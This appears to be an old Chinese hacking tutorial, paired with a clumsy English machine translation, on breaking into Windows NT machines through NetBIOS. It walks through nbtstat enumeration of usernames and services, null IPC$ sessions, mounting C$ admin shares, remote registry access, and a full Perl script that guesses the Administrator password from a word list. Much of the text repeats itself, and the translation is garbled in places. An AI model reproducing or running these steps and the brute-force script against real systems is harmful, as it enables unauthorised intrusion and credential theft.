所有的入侵都涉及到以root或admin权限登录到某一计算机或网络。 All of the invasion are related to the root or admin privileges to log on to a computer or network. 入侵的第一步往往是对目标计算机或的端口扫描(portscan)。 The first step is often the invasion of the target computer or the port scan (portscan). 建立在目标计算机开放端口上的攻击是相当有效的。 The establishment of an open port on the target computer attack is quite effective. NT机器的端口信息的显示和UNIX的不同。 NT machine and UNIX port information of the different shows. 因此,一般能区分出目标计算机所运行的是哪个操作系统。 Thus, the general able to distinguish between the target computer which is running the operating system.
攻击NT为基础的网络时,NetBIOS是首选的进攻点。 Attacks on NT-based network, NetBIOS is the preferred point of attack.
使用端口扫描软件,比如Sam,看看目标计算机的端口139是否打开。 Use port scanning software, such as Sam, take a look at the target computer's port 139 is open. 139端口是"NetBIOS session"端口,用来进行文件和打印共享的,是NT潜在的危险。 139 port is "NetBIOS session" port, used for file and print sharing is NT potentially dangerous. 注意:运行SAMBA的Linux和UNIX系统的139端口也是打开的,提供类似的文件共享。 Note: Run Linux and UNIX systems SAMBA port 139 is open, provide a similar file-sharing. 找到了这样的目标计算机后,接下来是使用" nbtstat"命令。 Find such a target computer, the next is to use "nbtstat" command.
NBTSTAT命令是用来询问有关NetBIOS的信息的,也能清除NetBIOS 缓冲区能的内容和将LMHOSTS文件预先装入其中。 NBTSTAT command is used to query information about NetBIOS, NetBIOS can also clear the contents of the buffer and can be pre-loaded into one of the LMHOSTS file. 通过运行这一命令能得到许多有用信息。 By running this command to get a lot of useful information.
NBTSTAT 命令解释:nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]开关: -a 列出给定主机名的远程计算机的名字表(name table) -A 列出给定IP地址的远程计算机的名字表-c 列出远程名字缓冲区(name cache),包括IP地址-n 列出本地NetBIOS 名字-r 列出通过广播(broadcast)和WINS解析的名字 NBTSTAT command interpreter: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval] Switches:-a list given host name of the remote computer's name table (name table)-A lists the given IP address of the remote computer's name table-c Lists the remote name of the buffer (name cache), including the IP address listed in the local NetBIOS name-n - r lists the radio (broadcast) and WINS name resolution
-R 清除和重新装入远程的缓冲的名字表 -R Clear and reload the remote cache name table
-S 列出和目标IP地址会话的表 -S and destination IP addresses listed in the table conversation
-s 列出会话表转换 -S Lists sessions table converting
NBTSTAT命令的输出的每一栏都有不同的含义,它们的标题有下面几个,含义也在下面做了相应的解释: NBTSTAT command output of each column has a different meaning, their titles are the following, made a corresponding meaning are explained below:
Input Input
接收到的字节数。 The number of bytes received.
Output Output
发送的字节数。 Number of bytes sent.
In/Out 这个连接是来自该计算机(outbound)还是来自另外的系统(inbound)。 In / Out of this connection from the computer (outbound) or from another system (inbound).
Life Life
在你的计算机清除名字表之前存在时间。 In the name of your computer to clear the table before the present time.
Local Name Local Name
连接时本地的名字。 Local connection name.
Remote Host Remote Host
远程计算机的名字或IP地址。 Remote computer name or IP address.
Type Type
一个名字可以有两种类型: unique 或group。 A name can have two types: unique or group.
NetBIOS名字的最后16个字符经常代表一些内容。 NetBIOS name of the last 16 characters often represent some of the content. 因为同样的名字可以在同一计算机出现几次。 Because the same name can appear several times on the same computer. 该类型表示名字的最后一个字节(用16进制表示)。 The type indicates the name of the last byte (in hexadecimal).
State State
你的NetBIOS连接将是下面几个状态之一: Your NetBIOS connections will be one of several states the following:
State MeaningAccepting 正在处理一个进入的连接Associated 一个连接的端点已经建立,你的计算机与它以一个IP地址相关Connected 你已经联系到了远程资源。 State MeaningAccepting is processing an incoming connection endpoint Associated established a connection, your computer and it Connected to an IP address that you have linked to a remote resource. Connecting 你的会话正试图对目标资源进行名字到IP地址的解析Disconnected 你的计算机发出一个断开请求,正在等待远程计算机的响应Disconnecting 正在结束你的连接 Connecting your session is trying to target resources on the name to IP address resolution Disconnected your computer sends a disconnect request sent, awaiting response Disconnecting the remote computer is the end of your connection
Idle 远程计算机在当前会话已经打开,但目前不接受连接 Idle remote computer in the current session has been opened, but does not accept connections
Inbound 一个inbound会话正试图连接 Inbound inbound session is trying to connect a
Listening 远程计算机可以使用了 Listening can use a remote computer
Outbound 你的会话正在建立一个TCP 连接 Outbound Your session is to establish a TCP connection
Reconnecting 如果第一次失败,它会在重新连接时显示这一信息下面是一个NBTSTAT命令的实例: Reconnecting if the first fails, it will display this information when re-connecting the following example is a NBTSTAT command:
C:\>nbtstat -A xxxx NetBIOS Remote Machine Name Table C: \> nbtstat-A xxxx NetBIOS Remote Machine Name Table
Name Type Status Name Type Status
---------------------------------------------------------------------- -------------------------------------------------- --------------------
DATARAT < 00> UNIQUE Registered DATARAT <00> UNIQUE Registered
R9LABS < 00> GROUP Registered R9LABS <00> GROUP Registered
DATARAT < 20> UNIQUE Registered DATARAT <20> UNIQUE Registered
DATARAT < 03> UNIQUE Registered DATARAT <03> UNIQUE Registered
GHOST < 03> UNIQUE Registered GHOST <03> UNIQUE Registered
DATARAT < 01> UNIQUE Registered DATARAT <01> UNIQUE Registered
MAC Address = 00-00-00-00-00-00 MAC Address = 00-00-00-00-00-00
上面的输出是什么意思呢? The above output what does that mean? 尤其是Type这一栏,代表的是什么呢。 Type in this column in particular, represent what is it. 再看看下面的表,它能告诉你什么? Look at the following table, which tells you what?
Name Number Type Usage=====================================================< computername> 00 U Workstation Service< computername> 01 U Messenger Service< \\_MSBROWSE_> 01 G Master Browser< computername> 03 U Messenger Service Name Number Type Usage ============================================== =======< computername> 00 U Workstation Service
< computername> 06 U RAS Server Service
< computername> 1F U NetDDE Service
< computername> 20 U File Server Service
< computername> 21 U RAS Client Service
< computername> 22 U Exchange Interchange
< computername> 23 U Exchange Store
< computername> 24 U Exchange Directory
< computername> 30 U Modem Sharing Server Service
< computername> 31 U Modem Sharing Client Service
< computername> 43 U SMS Client Remote Control
< computername> 44 U SMS Admin Remote Control Tool
< computername> 45 U SMS Client Remote Chat
< computername> 46 U SMS Client Remote Transfer
< computername> 4C U DEC Pathworks TCPIP Service
< computername> 52 U DEC Pathworks TCPIP Service
< computername> 87 U Exchange MTA
< computername> 6A U Exchange IMC
< computername> BE U Network Monitor Agent
< computername> BF U Network Monitor Apps
< username> 03 U Messenger Service
< domain> 00 G Domain Name
< domain> 1B U Domain Master Browser
< domain> 1C G Domain Controllers
< domain> 1D U Master Browser
< domain> 1E G Browser Service Elections
< INet~Services> 1C G Internet Information Server
< IS~Computer_name> 00 U Internet Information Server
< computername> [2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service Forte_ $ ND800ZA [20] U DCA Irmalan Gateway Service
Unique (U): 名字(name )可能只分配了一个IP地址。 Unique (U): name (name) may only be assigned an IP address. 在一个网络设备上,多次出现一个名字已经被注册,但后缀是唯一的,从而整个条目就是唯一的。 In a network device, multiple occurrences of a name has been registered, but the suffix is unique to the entire entry is unique.
Group (G): 普通的组(group),同一个名字可能存在多个IP地址。 Group (G): normal group (group), the same name may exist multiple IP addresses. Multihomed (M): 名字(name)是唯一的,但由于在同一计算机上有多个网络接口,这个配置在允许注册时是必须的。 Multihomed (M): name (name) is unique, but on the same computer with multiple network interfaces, this configuration allows registration is required. 地址的数目最多25个。 The number of addresses up to 25. Internet Group (I): 这是组名字的一个特殊配置,用于WinNT的域名的管理。 Internet Group (I): This is a group name, a special configuration, the management of the domain name for WinNT. Domain Name (D): NT 4.0里新增的。 Domain Name (D): NT 4.0 in the new.
这个表是对NBTSTAT输出中Type的解释。 This table is NBTSTAT output Type explanation. 通过详细分析NBTSTAT命令的输出,就能收集到目标计算机的许多信息。 Through detailed analysis of the NBTSTAT command output, you can collect a lot of information to the target computer. 通过分析,就能发现目标计算机正在运行什么服务,甚至可以分析安装的软件包是什么。 Through analysis, the target computer will be able to find what services are running, or even analyze what the package is installed. 从而就能找到空隙可以利用。 Which can be used to find the gap. 下一步就是从远程计算机收集可能的用户名。 The next step is to be collected from the remote computer's user name. 一个网络登录分成两个部分:用户名和口令。 A network logon is divided into two parts: the user name and password. 一旦一个入侵者知道了用户名,他就等于成功了一半。 Once an attacker knows the user name, he is half the battle.
通过分析NBTSTAT的命令输出,入侵者就能得到任何登录到那台计算机上的用户名。 By analyzing the NBTSTAT command output, the intruder will be able to get any login on that computer's user name. 在NBTSTAT输出里,类型(Type)为< 03>的就是用户名或计算机名。 In NBTSTAT output, the type (Type) is <03> is the user name or computer name. 类型(Type)为< 20>的就表示它是一个共享的资源。 Type (Type) <20> is it that it is a shared resource.
IPC$(Inter-Process Communication)共享是NT计算机上的一个标准的隐含共享,它是用于服务器之间的通信的。 IPC $ (Inter-Process Communication) share on the NT machine is a standard hidden share, which is used for communication between servers. NT计算机通过使用这个共享来和其他的计算机连接得到不同类型的信息的。 NT computer by using the shared connection to other computers and get different types of information. 入侵者常常利用这一点来,通过使用空的I PC会话进行攻击。 Intruders often use this to, through the use of air attack of I PC session.
有一个一个比较好的IPC会话工具:RedButton。 There is a tool for a better IPC session: RedButton. 它是个很灵巧的程序,能登录到NT系统而不会显示用户名和口令。 It is a very clever program, log on to the NT system can not display the user name and password. 这个工具运行环境是NT。 The tool environment is NT. 运行这个程序,将看到任何可能的共享,包括任何隐藏的a dmin共享(ie, shares以"$"结束。默认的,有几个这样的可以得到的共享...C$,WINNT$,IPC$等等)。 Run this program, you will see any possible shared, including any hidden a dmin share (ie, shares with "$" end. By default, there are several such can be shared ... C $, WINNT $, IPC $, etc.).
注意:IPC$共享不是一个目录,磁盘或打印机意义上的共享。 Note: IPC $ share is not a directory, disk or printer sharing of meaning. 你看到的"$",它是默认的在系统启动时的admin共享。 You see the "$", which is the default when the system starts the admin share. IPC是指"interproce ss communications"。 IPC refers to the "interproce ss communications". IPC$共享提供了登录到系统的能力。 The IPC $ share provides the ability to log into the system. 注意,你试图通过IPC$连接会在EventLog中留下记录。 Note that you will be trying to IPC $ connection to leave a record in the EventLog. 不管你是否登录成功。 Whether you log in successfully.
入侵者使用下面的命令对IPC$实施攻击: Intruders use the following command to the IPC $ attack:
c:\>net use \\[目标机器的IP地址]\ipc$ /user:< name> < passwd> c: \> net use \ \ [IP address of the target machine] \ ipc $ / user:
当这个连接建立后,要将username和password送去加以确认。 When the connection is established, the username and password sent to confirm. 如果你以"Administrator"登录,则需要进行口令猜测。 If you are the "Administrator" log in, you need to password guessing.
可以重复使用'net'命令,进行username和password猜测: You can re-use 'net' command, the username and password to guess:
c:\>net use \\xxx.xxx.xxx.xxx\ipc$ /user:< name> < passwd> c: \> net use \ \ xxx.xxx.xxx.xxx \ ipc $ / user:
也可以使用脚本语句: You can also use the script statement:
open(IPC, "net use \\xxx.xxx.xxx.xxx\ipc$ /user:< name> < passwd> | "); open (IPC, "net use \ \ xxx.xxx.xxx.xxx \ ipc $ / user:
NAT工具能自动完成上述功能。 NAT tool can automatically complete these functions. NAT是通过读取字典文件中的口令,进行重复登录,从而获取帐号。 NAT is by reading the dictionary file password, repeat login to access account. 当然,可以编写一个脚本来实现NAT的功能。 Of course, you can write a script to achieve the NAT function.
Perl是一种很好的语言,是解释性的,如Java,但运行速度比Java快。 Perl is a good language is interpreted, such as Java, but run faster than Java. 同时,Unix系统能解释它。 Meanwhile, Unix system can explain it. 现在,95和NT版的Perl也已经推出。 Now, 95 and NT version of Perl is also available.
下面这个脚本程序可以用来进行帐号和口令猜测。 The following script can be used for account and password guessing.
----- begin script ----- ----- Begin script -----
# ipcchk.plx # Ipcchk.plx
# 该脚本从一个文本文件读入单词,并将该单词作为用户名和口令,进行 # This script reads from a text file word and the word as the user name and password, the
# IPC$连接。 # IPC $ connection. 成功的连接保存到一个log文件。 Successful connection is saved to a log file. 该脚本不检查输入参数的 The script does not check the input parameters
# 有效性,因此必须输入目标机器的合法的IP地址。 # Effectiveness, so you must enter a legitimate target machine's IP address.
# #
# 用法: c:\>perl ipcchk.plx [目标机器的IP地址] # Usage: c: \> perl ipcchk.plx [target machine's IP address]
open(TEST, "names.txt") | | die "Could not open file."; open (TEST, "names.txt") | | die "Could not open file.";
open(LOG,">>ipc.log") | | die "Could not open log."; open (LOG, ">> ipc.log") | | die "Could not open log.";
if (length($ARGV[0]) == 0) { if (length ($ ARGV [0]) == 0) {
print "Usage: perl ipcchk.plx [ipaddr]"; print "Usage: perl ipcchk.plx [ipaddr]";
exit(0); exit (0);
} }
$server = ARGV[0]; $ Server = ARGV [0];
while(< TEST> ) { while (
$name = $_; $ Name = $ _;
chop($name); chop ($ name);
# print "net use \\\\$server\\ipc\$ /userdministrator $name | \n"; # Print "net use \ \ \ \ $ server \ \ ipc \ $ / userdministrator $ name | \ n";
open(IPC, "net use \\\\$server\\ipc\$ /userdministrator $name | "); open (IPC, "net use \ \ \ \ $ server \ \ ipc \ $ / userdministrator $ name |");
while(< IPC> ) { while (
if (grep(/successfully/,$_)) { if (grep (/ successfully /,$_)) {
print LOG "$server accepts connections for password $name\n"; print LOG "$ server accepts connections for password $ name \ n";
# delete a successful connection to avoid multiple connections to # Delete a successful connection to avoid multiple connections to
# the same machine # The same machine
open(DEL, "net use \\\\$server\\ipc\$ /d | "); open (DEL, "net use \ \ \ \ $ server \ \ ipc \ $ / d |");
} }
} }
----- end script ----- ----- End script -----
当然,你只要知道原理,可以用C语言或BASIC语言,编写一个具有上述功能的程序。 Of course, you just know theory, you can use C or BASIC language, write a program with these features.
一旦进入,就不仅仅是能够收集用户名了。 Once inside, it is not just to collect your username. 还能做许多其他事情。 Can do many other things.
接下来,入侵者会试图看看目标计算机上有那些共享的资源可以利用。 Next, the intruder will attempt to look at those on the target computer to share the resources available. 可以使用下面一个命令: You can use the following command:
c:\>net view \\[目标计算机的IP地址] c: \> net view \ \ [target computer's IP address]
根据目标计算机的安全策略,这个命令有可能被拒绝。 Depending on the target computer's security policy, this command may be rejected. 看看下面的例子: Consider the following example:
C:\>net view \\0.0.0.0System error 5 has occurred.Access is denied. C: \> net view \ \ 0.0.0.0System error 5 has occurred.Access is denied.
C:\>net use \\0.0.0.0\ipc$ "" /user:""The command completed successfully.C:\>net view \\0.0.0.0 C: \> net use \ \ 0.0.0.0 \ ipc $ "" / user: "" The command completed successfully.C: \> net view \ \ 0.0.0.0
Shared resources at \\0.0.0.0 Shared resources at \ \ 0.0.0.0
Share name Type Used as Comment Share name Type Used as Comment
------------------------------------------------------------------------------- -------------------------------------------------- -----------------------------
Accelerator Disk Agent Accelerator share for Seagate backup Accelerator Disk Agent Accelerator share for Seagate backup
Inetpub Disk Inetpub Disk
mirc Disk mirc Disk
NETLOGON Disk Logon server share NETLOGON Disk Logon server share
www_pages Disk www_pages Disk
该命令顺利地完成了。 The command completed successfully.
从上面的例子可见,直到空IPC会话成功建立后,服务器的共享资源列表才能访问到。 Can be seen from the above example, until the success of the IPC null session is established, the server's shared resources can be accessed. 在此时,你可能会想到,这样的IPC连接会有多危险呢,但目前为止我们的有关I PC的知识还是很基本的。 At this point, you might think, this IPC connection it would be more dangerous, but so far our knowledge of the I PC is still very basic. 我们仅仅开始研究IPC共享的可能性。 We are only beginning to study the possibility of IPC share.
如果有其它共享资源,可以用net命令进行连接。 If there are other shared resources, you can connect with the net command.
c:\>net use x: \\[ipaddr]\[share] c: \> net use x: \ \ [ipaddr] \ [share]
如果不行,用上述进行的攻击方法。 If not, attacks carried out using the above method.
一旦IPC$共享顺利完成,下一个命令是: Once the successful completion of the IPC $ share, the next command is:
c:\>net use g: \\xxx.xxx.xxx.xxx\c$ c: \> net use g: \ \ xxx.xxx.xxx.xxx \ c $
得到了C$共享,并将该目录映射到g:,键入: Was C $ share, and the directory is mapped to g:, type:
c:\>dir g: /p c: \> dir g: / p
就能显示这个目录的所有内容。 Will be able to display all the contents of this directory.
成功地进行了IPC$连接后,点击Start -> Run,键入regedit。 Successful conduct of the IPC $ connection, click Start -> Run, type regedit. 选择Registry -> Connect Network Registry,再键入那台机器的IP地址。 Select Registry -> Connect Network Registry, and then type the IP address of that machine. 不一会,就能看目标计算机的的Registry了。 Soon, you can see the target computer's Registry.
*************************************************************************** ************************************************** *************************
网络入侵者通常采取的第一步是通过端口扫描程序扫描目标机或网络。 Network intruders usually the first step taken by a port scanner scans the target machine or network. 令人吃惊的是,以目标机的开放端口为基础对网络进行的攻击是多么的有条不紊。 Surprisingly, to target the open ports of the network based on how methodical attack. 您应该清楚,除了Unix机外,这是NT机显示不同开放端口的标准。 You should be aware that in addition to Unix machine, which is the NT machine to display different open ports standard. 网络入侵者懂得查看端口扫描程序,并通过相当准确的结果来断定它是一台NT机还是一台Unix机。 Network intruders know how to check port scanner, and by very accurate to conclude that the results of an NT machine, or a Unix machine. 当然也有一些例外,但一般情况下都能这样做。 Of course, there are some exceptions, but generally able to do so. 最近,业界发布了几个用来远程鉴别机器的工具,但该功能目前还不能用于NT。 Recently, the industry released several tools used to remotely identify the machine, but the feature is not available for NT.
当攻击基于NT的网络时,NetBIOS往往是首选的攻击对象。 When NT-based network attacks, NetBIOS is often the preferred target of attack. 因此,NetBIOS就成为本文中第一个要探讨的重要课题。 Therefore, NetBIOS has become the first to explore this important issue. 用NetBIOS进行信息收集相当容易,虽然要花费一点时间。 Information-gathering with NetBIOS fairly easy, although I have to spend a little time. etBIOS一般被看作是开销,很大的大容量协议,速度往往很慢,这也就是要耗费时间的原因。 etBIOS are generally regarded as expensive, very high-capacity protocol, speed is often very slow, which is the reason to be time-consuming. 如果端口扫描程序报告端口139在目标机上是开放的,那么接下来就是一个很自然的过程。 If the port scanner reports port 139 is open on the target machine, then the next is a very natural process. 第一步是发出NBTSTAT命令。 The first step is to issue NBTSTAT command.
NBTSTAT命令可以用来查询涉及到NetBIOS信息的网络机器。 NBTSTAT command can be used to query NetBIOS information related to the network machine. 另外,它还可以用来 In addition, it can be used to
消除NetBIOS高速缓存器和预加载LMHOSTS文件。 Eliminate NetBIOS cache and preloading the LMHOSTS file. 这个命令在进行安全检查时非常有用。 This command is useful when carrying out security checks.
用法:nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S]
[-s] [-S]
[interval] [Interval]
参数-a列出为其主机名提供的远程计算机名字表。 Argument-a list of host names for remote computer name table.
-A列出为其IP地址提供的远程计算机名字表。 -A lists the IP address for the remote computer name table.
-c列出包括了IP地址的远程名字高速缓存器。 -C Lists the remote IP address including the name cache.
-n列出本地NetBIOS名字。 -N lists the local NetBIOS names.
-r列出通过广播和WINS解析的名字。 -R lists the radio and WINS to resolve names.
-R消除和重新加载远程高速缓存器名字表。 -R remove and re-load the remote cache name table.
-S列出有目的地IP地址的会话表。 -S lists the destination IP address of the session table.
-s列出会话表对话。 -S Lists sessions table dialogue.
NBTSTAT生成的列标题具有以下含义: NBTSTAT generated column headings have the following meanings:
Input Input
接收到的字节数。 The number of bytes received.
Output Output
发出的字节数。 The number of bytes sent.
In/Out In / Out
无论是从计算机(出站)还是从另一个系统连接到本地计算机(入站)。 Either from the computer (outbound) or from another system to connect to the local computer (inbound).
Life Life
在计算机消除名字表高速缓存表目前“度过”的时间。 In the computer name table cache table to eliminate the current "spend" time.
Local Name Local Name
为连接提供的本地NetBIOS名字。 Provided to connect local NetBIOS names.
Remote Host Remote Host
远程主机的名字或IP地址。 Remote host name or IP address.
Type Type
一个名字可以具备两个类型之一:unique or group A name can have two types: unique or group
在16个字符的NetBIOS名中,最后一个字节往往有具体含义,因为同一个名可以在同一台计算机上出现多次。 In the 16 character NetBIOS name, the last byte often have specific meanings, as the same name can appear multiple times on the same computer. 这表明该名字的最后一个字节被转换成了16进制。 This indicates that the name of the last byte is converted into hexadecimal.
State State
NetBIOS连接将在下列“状态”(任何一个)中显示: NetBIOS connections in the following "state" (any one) shows:
状态含义: Status Meaning:
Accepting: 进入连接正在进行中。 Accepting: enter the connection is in progress.
Associated: 连接的端点已经建立,计算机已经与IP地址联系起来。 Associated: the connection endpoint has been established, the computer has an IP address linked.
Connected: 这是一个好的状态! Connected: This is a good state! 它表明您被连接到远程资源上。 It shows that you are connected to remote resources.
Connecting: 您的会话试着解析目的地资源的名字-IP地址映射。 Connecting: You try to parse the session resources in the name of the destination-IP address mapping.
Disconnected: 您的计算机请求断开,并等待远程计算机作出这样的反应。 Disconnected: request disconnect your computer and wait for the remote computer to make such a response.
Disconnecting: 您的连接正在结束。 Disconnecting: Your connection is ending.
Idle: 远程计算机在当前会话中已经打开,但现在没有接受连接。 Idle: the remote computer in the current session has been opened, but did not accept the connection.
Inbound: 入站会话试着连接。 Inbound: Inbound session to try to connect.
Listening: 远程计算机可用。 Listening: remote computer is available.
Outbound: 您的会话正在建立TCP连接。 Outbound: Your session is to establish a TCP connection.
Reconnecting: 如果第一次连接失败,就会显示这个状态,表示试着重新连接 Reconnecting: If the first connection fails, it will show the state that try to reconnect
下面是一台机器的NBTSTAT反应样本: The following is a sample machine NBTSTAT response:
C:\>nbtstat CA xxxx C: \> nbtstat CA xxxx
NetBIOS Remote Machine Name Table NetBIOS Remote Machine Name Table
Name Type Status Name Type Status
--------------------------------------------- ---------------------------------------------
DATARAT <00> UNIQUE Registered DATARAT <00> UNIQUE Registered
R9LABS <00> GROUP Registered R9LABS <00> GROUP Registered
DATARAT <20> UNIQUE Registered DATARAT <20> UNIQUE Registered
DATARAT <03> UNIQUE Registered DATARAT <03> UNIQUE Registered
GHOST <03> UNIFQUE Registered GHOST <03> UNIFQUE Registered
DATARAT <01> UNIQUE Registered DATARAT <01> UNIQUE Registered
MAC Address = 00-00-00-00-00-00 MAC Address = 00-00-00-00-00-00
您通过下表能掌握有关该机器的哪些知识呢? You can grasp the following table on the machine which knowledge?
名称编号类型的使用: Name Number Type of Use:
00 U 工作站服务 00 U Workstation Service
01 U 邮件服务 01 U mail service
\\_MSBROWSE_ 01 G 主浏览器 \ \ _MSBROWSE_ 01 G Master Browser
03 U 邮件服务 03 U mail service
06 U RAS服务器服务 06 U RAS Server Service
1F U NetDDE服务 1F U NetDDE Service
20 U 文件服务器服务 20 U File Server Service
21 U RAS客户机服务 21 U RAS Client Service
22 U Exchange Interchange 22 U Exchange Interchange
23 U Exchange Store 23 U Exchange Store
24 U Exchange Directory 24 U Exchange Directory
30 U 调制解调器共享服务器服务 30 U Modem Sharing Server Service
31 U 调制解调器共享客户机服务 31 U Modem Sharing Client Service
43 U SMS客户机远程控制 43 U SMS Client Remote Control
44 U SMS管理远程控制工具 44 U SMS management tools for remote control
45 U SMS客户机远程聊天 45 U SMS Client Remote Chat
46 U SMS客户机远程传输 46 U SMS Client Remote Transfer
4C U DEC Pathworks TCP/IP服务 4C U DEC Pathworks TCP / IP Services
52 U DEC Pathworks TCP/IP服务 52 U DEC Pathworks TCP / IP Services
87 U Exchange MTA 87 U Exchange MTA
6A U Exchange IMC 6A U Exchange IMC
BE U网络监控代理 BE U Network Monitor Agent
BF U网络监控应用 BF U Network Monitor Application
03 U邮件服务 03 U mail service
00 G域名 00 G Domain Name
1B U域主浏览器 1B U Domain Master Browser
1C G域控制器 1C G Domain Controllers
1D U主浏览器 1D U Master Browser
1E G浏览器服务选择 1E G Browser Service Selection
1C G Internet信息服务器 1C G Internet Information Server
00 U Internet信息服务器 00 U Internet Information Server
[2B] U Lotus Notes服务器 [2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan网关服务 Forte_ $ ND800ZA [20] U DCA Irmalan gateway service
Unique (U): 该名字可能只有一个分配给它的IP地址。 Unique (U): The name may have only one IP address assigned to it. 在网络设备上,一个要注册的名字 The network device, a name to be registered
可以出现多次,但其后缀是唯一的,从而使整个名字是唯一的。 Can appear multiple times, but the suffix is unique, so that the name is unique.
Group (G): 一个正常的群;一个名字可以有很多个IP地址。 Group (G): a normal group; a name can have a number of IP addresses.
Multihomed (M): 该名字是唯一的,但由于在同一台计算机上有多个网络接口, Multihomed (M): The name is unique, but on the same computer with multiple network interfaces,
这个配置可允许注册。 This configuration allows registered. 这些地址的最大编号是25。 The maximum number of these addresses is 25.
Internet Group (I): 这是用来管理WinNT域名的组名字的特殊配置。 Internet Group (I): This is used to manage WinNT domain names set special configuration.
Domain Name (D): NT 4.0提供的新内容。 Domain Name (D): NT 4.0 to provide new content.
网络入侵者可以通过上表和从nbtstat获得的输出信息开始收集有关您的机器的信息。 Network intruders can get on the table and the output from nbtstat started to collect information about your machine.
有了这些信息,网络入侵者就能在一定程度上断定有哪些服务正在目标机上运行,有时也 With this information, the intruder will be able to some extent, determine what services are running on the target machine, sometimes
能断定已经安装了哪些软件包。 To determine which packages already installed. 从传统上讲,每个服务或主要的软件包都具有一定的脆弱性,因此,这一类型的信息对网络入侵者当然有用。 Traditionally, each service or major software packages have a certain vulnerability, therefore, this type of information is certainly useful to an intruder.
========================================第二个逻辑步骤是通过远程机收集可能的用户名。 ======================================== The second logical step is to collect the remote machine possible usernames. 网络登录包括两个部分:用户名和口令。 Network login consists of two parts: the user name and password. 一旦网络入侵者掌握了有效的用户列表,他就能获得一半的有效登录信息。 Once an intruder has mastered the valid user list, he can get half of the valid login information. 现在,采用了nbtstat命令,网络入侵者就能掌握从本地注册到该台机器上的任何人的登录名。 Now, using the nbtstat command, the intruder will be able to grasp from the local to the machine registered on anyone's login name. 在通过nbtstat命令得到的结果中,采用<03>识别符的表目是用户名或机器名。 In the results obtained by the nbtstat command, using <03> is the identifier of the table present the user name or machine name. 另外,还可以通过空IPC会话和SID工具来收集用户名(详细内容见“SID工具”,附录B) 。 In addition, you can also null IPC session and the SID tools to collect the user name (for details, see "SID Tools", Appendix B). IPC$(进程间通信)共享是NT主机上一个标准的隐藏共享,主要用于服务器到服务器的通信。 IPC $ (interprocess communication) share is NT host on a standard hidden share, primarily for server to server communication. NT主机用来互相连接并通过这个共享来获得各种必要的信息。 NT host to connect to each other to get through the sharing of necessary information. 鉴于在各种操作系统中都有很多设计特征,网络入侵者已经懂得利用这种特征来达到他们的目的。 Given the variety of operating systems have many design features, network intruders already know how to use this feature to achieve their goals. 通过连接这个共享,网络入侵者从技术上就能够实现与您的服务器的有效连接。 By connecting to this share, the network intruder can be achieved technically with a valid connection to your server. 通过与这个共享的空连,网络入侵者就能够在不需要提供任何身份证明的情况下建立这一连接。 This shared space with connection, the intruder can not provide any proof of identity in the case to establish this connection.
要与IPC$共享进行空连接,网络入侵者就在命令提示符下发出如下命令: With the IPC $ share for air connectivity, network intruders in the command prompt, issue the following command:
c:\>net use \\[目标主机的IP地址]\ipc$ "" /user:"" c: \> net use \ \ [IP address of target host] \ ipc $ "" / user: ""
如果连接成功,网络入侵者就会有很多事情可做,不只是收集用户列表,不过他是以收集用户列表开始的。 If successful, the intruder will have a lot of things to do, not just collect user list, but he is starting to collect the list of users. 如上所述,这个方法需要一个空IPC会话和SID工具。 As mentioned above, this method requires a null IPC session and the SID tools. 由Evgenii Rudnyi编写的SID工具包括两个不同的部分:User2sid和Sid2user。 Evgenii Rudnyi written by the SID tool consists of two distinct parts: User2sid and Sid2user. User2sid采用一个帐户名字或群组,给您一个对应的SID。 User2sid using an account name or group, to give you a corresponding SID. 而Sid2user采用一个SID,给您对应的用户或群组的名字。 The Sid2user use a SID, corresponding to your user or group name. 作为一个独立的工具,这个进程是手工进行的,要消耗大量的时间。 As a stand-alone tool, the process is manual, to spend a lot of time. Userlist.pl是monix编写的一个perl脚本,它将使这个SID进程自动化,从而大大缩短网络入侵者收集这些消息所花费的时间。 Userlist.pl is monix write a perl script, it will automate the process of this SID, thus greatly reducing network intruders to collect these messages takes time.
这时,网络入侵者就会了解到哪些服务正在远程机上运行以及已经安装了哪些主要的软件包(有限的),同时还能得到该机器上有效的用户名和群组列表。 At this time, the intruder will know what services are running on a remote machine and have installed the main package which (limited), while the machine to be a valid user name and group list. 尽管这似乎是一个外来者所要掌握的有关您的网络的信息,但是,空IPC会话已经为信息收集留下了其它隐患。 Although this seems to be an outsider to be mastered information about your network, but the null IPC session has left a collection of information other risks. 目前,Rhino9小组已经能够检索远程机的全部固有安全约束规则。 Currently, Rhino9 team has been able to retrieve all of the remote machine constraints inherent safety rules. 帐户封锁、最小口令长度、口令使用周期、口令唯一性设置以及每一个用户、他们所归属的群组以及该用户的个人域限制等所有信息都可以通过一个IPC空会话获得。 Account lockout, minimum password length, password lifetime, password uniqueness settings as well as each user, group, and they belong to the user's personal domain restrictions and all other information can be obtained through an IPC null session. 这个信息收集功能将在近期发布的eviathan工具(由Rhino9小组编写)中提供。 This information-gathering capabilities in the recently released eviathan tool (written by the Rhino9 team) provided. 下面将对目前可用的一些工具进行探讨,这些工具可用来通过空IPC会话收集更多的信息. The following will present some of the tools available to explore these tools can be used by the IPC null session to gather more information.
有了这个空IPC会话,网络入侵者也能获得网络共享列表,否则就无法得到。 With the null IPC session, an intruder can obtain a list of network shares, or can not be. 为此,网络入侵者希望了解到在您的机器上有哪些可用的网络共享。 To this end, the network intruder hope you understand what the machine is available on a network share. 为了收集到这些信息,要采用下列这个标准的net view命令: To collect this information, this standard should be adopted following the net view command:
c:\>net view \\[远程主机的IP地址] c: \> net view \ \ [remote host's IP address]
根据目标机的安全约束规则,可以拒绝或不拒绝这个列表。 Depending on the target machine's security constraint rules, you can not refuse or reject the list. 举例如下: Examples are as follows:
C:\>net view \\0.0.0.0 C: \> net view \ \ 0.0.0.0
System error 5 has occurred. System error 5 has occurred.
Access is denied. Access is denied.
